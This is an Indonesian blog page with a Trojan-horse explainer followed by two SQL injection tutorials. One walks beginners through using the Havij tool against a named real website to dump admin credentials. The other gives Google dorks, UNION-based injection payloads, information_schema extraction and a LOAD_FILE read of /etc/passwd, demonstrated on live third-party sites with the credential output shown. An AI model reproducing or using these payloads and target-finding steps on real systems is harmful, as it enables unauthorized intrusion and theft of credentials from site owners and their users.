Atasi Luka Bakar Dan Lecet Dengan Nutrimoist Tanpa Bekas

Showing posts with label HACKER. Show all posts
Showing posts with label HACKER. Show all posts

Tuesday, December 29, 2015

Yuk Berkenalan Dengan Virus Trojan Horse

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).

Cara Kerja

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:
  • Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.
  • Trojan dikendalikan dari komputer lain (komputer attacker).

Cara Penyebaran

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.
Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

Jenis-jenis Trojan

Beberapa jenis Trojan yang beredar antara lain adalah:
  • Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas Security Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pengguna dengan membuat tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) serta menunggu pengguna untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya digunakan untuk menambah keamanan password dalam sistem operasi Windows NT, tapi disalahgunakan menjadi sebuah program pencuri password.
  • Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pengguna dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal tersebut melakukan hal yang serupa (memata-matai pengguna).
  • Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kontrol secara penuh terhadap sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.
  • DDoS Trojan atau Zombie Trojan: Jenis Trojan ini digunakan untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi terhadap host target.
  • Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus.
  • Cookies Stuffing, ini adalah script yang termasuk dalam metode blackhat, gunanya untuk membajak tracking code penjualan suatu produk, sehingga komisi penjualan diterima oleh pemasang cookies stuffing, bukan oleh orang yang terlebih dahulu mereferensikan penjualan produk tersebut di internet

Pendeteksian dan Pembersihan

Memeriksa Listening Port

Mendeteksi keberadaan Trojan merupakan sebuah tindakan yang agak sulit dilakukan. Cara termudah adalah dengan melihat port-port mana yang terbuka dan sedang berada dalam keadaan "listening", dengan menggunakan utilitas tertentu semacam Netstat. Hal ini dikarenakan banyak Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.
Berikut ini adalah contoh penggunaan utilitas Netstat dalam Windows XP Professional

Membuat Snapshot

Cara lainnya yang dapat digunakan adalah dengan membuat sebuah "snapshot" terhadap semua berkas program (*.EXE, *.DLL, *.COM, *.VXD, dan lain-lain) dan membandingkannya seiring dengan waktu dengan versi-versi terdahulunya, dalam kondisi komputer tidak terkoneksi ke jaringan. Hal ini dapat dilakukan dengan membuat sebuah checksum terhadap semua berkas program (dengan CRC atau MD5 atau mekanisme lainnya). Karena seringnya Trojan dimasukkan ke dalam direktori di mana sistem operasi berada (\WINDOWS atau \WINNT untuk Windows atau /bin, /usr/bin, /sbin, /usr/sbin dalam keluarga UNIX), maka yang patut dicurigai adalah berkas-berkas yang berada di dalam direktori tersebut. Banyak berkas yang dapat dicurigai, khususnya berkas-berkas program yang memiliki nama yang mirip dengan berkas yang "baik-baik" (seperti "svch0st.exe", dari yang seharusnya "svchost.exe", sebuah berkas yang dijalankan oleh banyak layanan sistem operasi Windows) dapat dicurigai sebagai Trojan Horse.

Antivirus

Cara terakhir adalah dengan menggunakan sebuah perangkat lunak antivirus, yang dilengkapi kemampuan untuk mendeteksi Trojan yang dipadukan dengan firewall yang memonitor setiap transmisi yang masuk dan keluar. Cara ini lebih efisien, tapi lebih mahal, karena umumnya perangkat lunak antivirus yang dipadukan dengan firewall memiliki harga yang lebih mahal dibandingkan dengan dua cara di atas (yang cenderung "gratis"). Memang, ada beberapa perangkat yang gratis, tapi tetap saja dibutuhkan waktu, tenaga dan uang untuk mendapatkannya (mengunduhnya dari Internet).

SQL injection menggunakan Havij


Semangat pagi semua.. Kali ini saya mau share tentang SQL Injection. Kalo menurut saya sih hack website dengan sqli merupakan proses yang paling rumit dan lama tentunya, apalagi buat pemula kaya saya ini, he~  Namun dengan berkembangnya software, saya yang pemula ini bisa juga melakukan SQL Injection walaupun masih pake tool havij, hehe..
Jadi intinya tutorial ini buat para pemula di dunia hacker seperti saya ini, buat yang dewa abaikan aja postingan ini :-)
Kita siapin dulu alat tempur utama kita :-)
Langsung Download Havijnya dimari gan..
 Havij v1.15 Free
 Havij v1.14 Free
 Havij v1.13 Free 
 Havij v1.12 Free
 Havij v1.10


1.) Buka havij dengan cara double klick

2. Download dork di SINI. lalu copy ke google [bebas yang mana saja]

3.Contoh disini saya ambil target : http://beeindia.in/content.php?page=schemes/schemes.php?id=1 . Untuk menentukan website tsb vuln atau tidak, kita beri karakter ' di url terakhir menjadi http://beeindia.in/content.php?page=schemes/schemes.php?id=1'
[Vulnerability bisa berupa tulisan error pada syntax dan bisa berupa tampilan yang berbeda dari sebelumnya]

4.Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5. Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.


6. Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.


7. Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.


8. Keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.


9. Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE atau sobat bisa juga mencari admin page finder online :D

Pengertian SQL Injection Dan Contoh Penenerapannya

I. Pengertian
Sedikit penjelasan, apakah yang dimaksud dengan SQL injection..?? SQL injection adalah serangan yang memanfaatkan kelalaian dari website yang mengijinkan user untuk menginputkan data tertentu tanpa melakukan filter terhadap malicious character. Inputan tersebut biasanya di masukan pada box search atau bagian-bagian tertentu dari website yang berinteraksi dengan database SQL dari situs tersebut. Perintah yang dimasukan para attacker biasanya adalah sebuah data yang mengandung link tertentu yang mengarahkan para korban ke website khusus yang digunakan para attacker untuk mengambil data pribadi korban. Untuk menghindari link berbahaya dari website yang telah terinfeksi serangan SQL injection, Anda dapat menggunakan aplikasi tambahan seperti NoScript yang merupakan Add-ons untuk aplikasi web browser Firefox. Meskipun tidak terlalu sempurna, setidaknya Anda dapat mengurangi kemungkinan Anda menjadi korban.

2. bagaimana kita menemukan website yang vuln (kali ini saya menggunakan Google)? 

dalam Google terdapat banyak sekali kata kunci untuk menemukan website yang vuln  ada beberapa contoh kata kunci untuk menemukan website yang vuln :

inurl:content.php?id= 
inurl:index.php?id= 
inurl:main.php?id= 
inurl:streampage.php?id= 
inurl:base.php?id= 
inurl:content.php?id= 
inurl:catalog.php?id= 
inurl:view.php?id= 
inurl:detail.php?id= 
inurl:page.php?id=

3. mencari vuln 

contoh , Google memberikan kita link :
situs.com/index.php?id=1


memulai pencarian vuln di parameter ID 
a. situs.com/index.php?id=1+and+1=1 (true dan true = true) 
jika keluar halaman seperti id=1, mungkin itu merupakan vuln website 
situs.com/index.php?id=1+and+1=2 (true dan true = false) 
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable 
b. situs.com/index.php?id=1'+and+'1'='1 (true dan true = true) 
situs.com/index.php?id=1'+and+'1'='2 (true dan false = false) 
c. situs.com/index.php?id=1"+and+"1"="1 (true dan true = true) 
situs.com/index.php?id=1"+and+"1"="2 (true dan false = false) 
d. situs.com/index.php?id=1+order+by+1--+ 
situs.com/index.php?id=1+order+by+1000+--+ 
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable 
e. situs.com/index.php?id=1 
situs.com/index.php?id=2-1 
f. situs.com/index.php?id=1 
situs.com/index.php?id=1*1 
g. situs.com/index.php?id= 
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable 
h. mysite.com/index.php?id=1' 
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable 
i. mysite.com/index.php?id=1malingsial 
"Unknown column '1malingsial' in 'where clause" <--- vuln 
j. situs.com/index.php?id=1)/* 
k. situs.com/index.php?id=1')--+ 
l. situs.com/index.php?id=1"/* 
m. situs.com/index.php?id=1))—+


website yang vuln tidak hanya pada query ini aja "index.php?id=1: situs.com/index.php/id/6/ situs.com/index.HTM?id=1 kenapa ditemukan error atau redirect???? okee agar dapat dimengerti, anda harus mempunyai kemampuan dalam pemrograman PHP dan MySql 
disini saya akan menulis script PHP yang simple dengan vulnerable

$q = "SELECT id,info FROM mytable WHERE id=".$id; 
$r = mysql_query($q); 
$result = mysql_fetch_row($r); 
echo "myid ".$result[0]." 
info".$result[1];

ketika saya menulis id=1 and 1 = 1:

$q = "SELECT id,info FROM mytable WHERE id=1 and 1=1"; 
$r = mysql_query($q); 
$result = mysql_fetch_row($r); 
echo "myid ".$result[0]." 
info".$result[1];

dapat dilihat tidak ada error karna id = 1. bila saya menulis id=1 and 1 = 2:

$q = "SELECT id,info FROM mytable WHERE id=1 and 1=2"; 
$r = mysql_query($q); 
$result = mysql_fetch_row($r); 
echo "myid ".$result[0]." 
info".$result[1];
akan keluar error karena 1<>2. jika saya menulis: 
$q = "SELECT id,info FROM mytable WHERE id=".intval($id); 
$r = mysql_query($q); 
$result = mysql_fetch_row($r); 
echo "myid ".$result[0]." 
info".$result[1];

atau

$q = "SELECT id,info FROM mytable WHERE id=' ".addslashes($id)." ' "; //without spaces 
$r = mysql_query($q); 
$result = mysql_fetch_row($r); 
echo "myid ".$result[0]." 
info".$result[1];

jika anda mengetikan id=1+and+1=2 maka akan diterima id=1 atau jika anda mengetikan 1' maka akan menerima 1 juga. itu berarti anda dapat menjebol website tersebut dengan metode SQL-Injection.

4. Mencari nomor kolom. dalam hal ini ada 2 untuk mencari nomor kolom:

a. situs.com/index.php?id=1+and+1=2+UNION+SELECT+1+--+ situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2+--+ situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2,3+—+

apakah jumlahnya lebih tinggi sedangkan anda tidak melihat angka..? (mungkin terdapat dalam source code)

b. menggunakan perintah " order by" (digunakan untuk mengurutkan kolom berdasarkan angka). situs.com/index.php?id=1+order+by+1+--+ (tidak ada error) situs.com/index.php?id=1+order+by+1000+--+ (bila disini keluar error berarti didalam query tidak mempunyai 1000 kolom) situs.com/index.php?id=1+order+by+50+--+ ... jika tidak keluar error, contoh, kita anda mengetikan order+by+10, dan keluar error ketika anda mengetikan order+by+11+--+ berarti query tersebut hanya mempunyai 10 kolom. jika anda menemukan nomor kolom (dalam hal ini 10) maka perintah yang harus diketikan :

situs.com/index.php?id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10+—+

atau

situs.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+—+

1+and+1=2 (true dan true=false) sama dengan id=-1 dan 1+and+1=1 (true dan true=true) sama dengan id=1

5. mengeluarkan database sekarang kita akan mengeluarkan database dalam hal ini saya sertakan dengan Live Demo: http://www.ewpa-majs...ECT+1,2,3,4+--+ 4 tabel, nomor kolom: 3 tapi sebelum itu, kita harus mencari database, user dan versi MySqlnya. Berikut contoh pencarian database, user dan versi MySqlnya. http://www.ewpa-majs...concat(version(),0x3a,database(),0x3a,user()),4+--+ 0x3a - adalah konversi hex dari " : ". anda juga dapat menggunakan syntax tanpa ():

version()=@@version 
user()=CURRENT_USER 
database : ewpa_majster01 
user : ewpa_majster01@127.0.0.1 
versi My SQL: 5.0.51a-24+lenny2+spu1-log

kemudian kita harus menemukan semua databasenya: Berikut Syntax yang digunakan : group_concat(schema_name) + from + information_schema.schemata Berikut Contoh Pengeluaran Databasenya: http://www.ewpa-majs...cat(schema_name),4+from+information_schema.schemata+--+ seperti yang kita liat ada 2 database : information_schema,ewpa_majster01 kemudian kita melanjutkan dengan mengeluarkan nama tabelnya: berikut syntax yang digunakan :
group_concat(table_name) from information_schema.tables

Berikut contoh pengeluaran nama tabelnya : http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+--+ karna cukup banyak nama tabelnya jadi saya tidak menulisnya disini... karna kita tidak memerlukan tabel yang dari database "information_schema": berikut syntax yang digunakan :

group_concat(table_name) from information_schema.tables + where + table_schema<>information_schema

Berikut Contoh pengeluaran nama tabel tanpa tabel dari database "information_schema" : http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+ 696e666f726d6174696f6e5f736368656d61 = hasil konversi hex dari "information_schema" tapi anda juga bisa mencoba ini: http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+where+table_schema=database()+--+ kemudian kita harus menemukan kolomnya (dalam contoh saya mengambil tabel ewpa_user): Berikut Syntax yang digunakan :

group_concat(column_name) + from + information_schema.columns + where + table_name=0xHEXDARINAMATABEL

Berikut contoh mengeluarkan kolom dari tabel :

http://www.ewpa-majs...cat(column_name),4+from+information_schema.columns+where+table_name=0x657770615f75736572+—+ 
657770615f75736572 = hasil konversi hex dari tabel "ewpa_user" daftar kolom-kolom : id,login,pass Kemudian Langkah Selanjutnya adalah mengeluarkan seluruh isi kolom yang ada di dalam tabel Berikut Syntax yang digunakan :

group_concat(nama kolom,[0x3a],nama kolom...) +from+nama tabel

Berikut contoh mengeluarkan seluruh isi kolom dari tabel :

http://www.ewpa-majs...login,0x3a,pass),4+from+ewpa_user+—+

Hasilnya : ID=1 login=admin pass=646224a5..., ID=2 login=dyalcom pass=098f6b... jika anda ingin mengeluarkan hanya 1 per 1 isi kolom saja, gunakan syntax : LIMIT [row],columns_count: Berikut contohnya :

http://www.ewpa-majs...a+LIMIT+0,4+--+ http://www.ewpa-majs...a+LIMIT+1,4+--+ http://www.ewpa-majs...a+LIMIT+2,4+—+

Jika Keluar Error : "Illegal mix of collations" anda harus menggunakan perintah unhex(hex()) (contoh : unhex(hex(database()))) melihat password r00t: berikut syntax yang digunakan :

situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE('etc/passwd'),4+—+

atau

situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4+—+

contoh : http://www.webnewshu...32f706173737764),3+--+&rcid=2

jika anda mempunya password r00t anda bisa melakukan apapun diserver itu.. (contoh menggunakan program telnet)

6. 2 query jika anda menginject website dengan 2 query anda tidak perlu menemukan nomor kolom lagi, karna akan keluar error : Berikut Contoh Syntax yang digunakan untuk double query :

situs.com/index.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a)+as+t+JOIN+(SE ​LECT+NAME_CONST(user(),14)a)b)c) 
>v5.0.12

NAME_CONST(nama,value) Bagaimana Query ini bekerja..? gabungkan query kiri ke query kanan dengan satu nama kolom. Sekian Sedikit Penjelasan Saya Tentang "Pengertian SQL Injection & Cara Mengimplementasikannya" ....

Semoga Artikel ini dapat membantu manteman dan tentunya menambah pengetahuan..:)

Ingin dapat tips Kesehatan Dan Info Seputar Kehidupan Yuks Di follow fans Fage Kami.

Dikirim oleh Zulfahmi Muhabbar pada 3 Januari 2016

Produk Paling Laku Bulan Ini

Produk Paling Laku Bulan Ini
Well 3 Royalzim, Sang Pionir Enzim Kompleks

Kategori Artikel

AGAMA (13) ALAM SEMESTA (5) ANDROID (1) BERITA (42) BLOGGER (7) COMPUTER (17) DREAM (1) ENGLISH (1) ENTERTAIMENT (7) FIKSI (9) GAME (3) GRAFITI (1) HACKER (3) HARDWARE (15) HOROR (3) HP (2) INFO (91) INSPIRATIF (16) INTERNET (9) KATA BIJAK (3) KEAMANAN KOMPUTER (2) KECANTIKAN (9) KEJAHATAN (3) KESEHATAN (30) KISAH (6) KOMPUTER (7) LAPTOP (3) LOPE (14) LUAR ANGKASA (1) LUCU (13) MAKANAN (10) MISTERI (4) NETWORK (7) OFFICE (18) OLAHRAGA (2) OS (5) PENDIDIKAN (13) Produk CNI (61) PSIKOLOGI (18) PUISI (1) RUMAH TANGGA (14) SOFTWARE (37) TEKNOLOGI (46) TIPS (66) TOKOH (9) TROUBLESHOOTING (12) TUGAS KULIAH (3) TUTORIAL (14) UNIK (18) WINDOWS (2) WIRELESS (7) WISATA (2)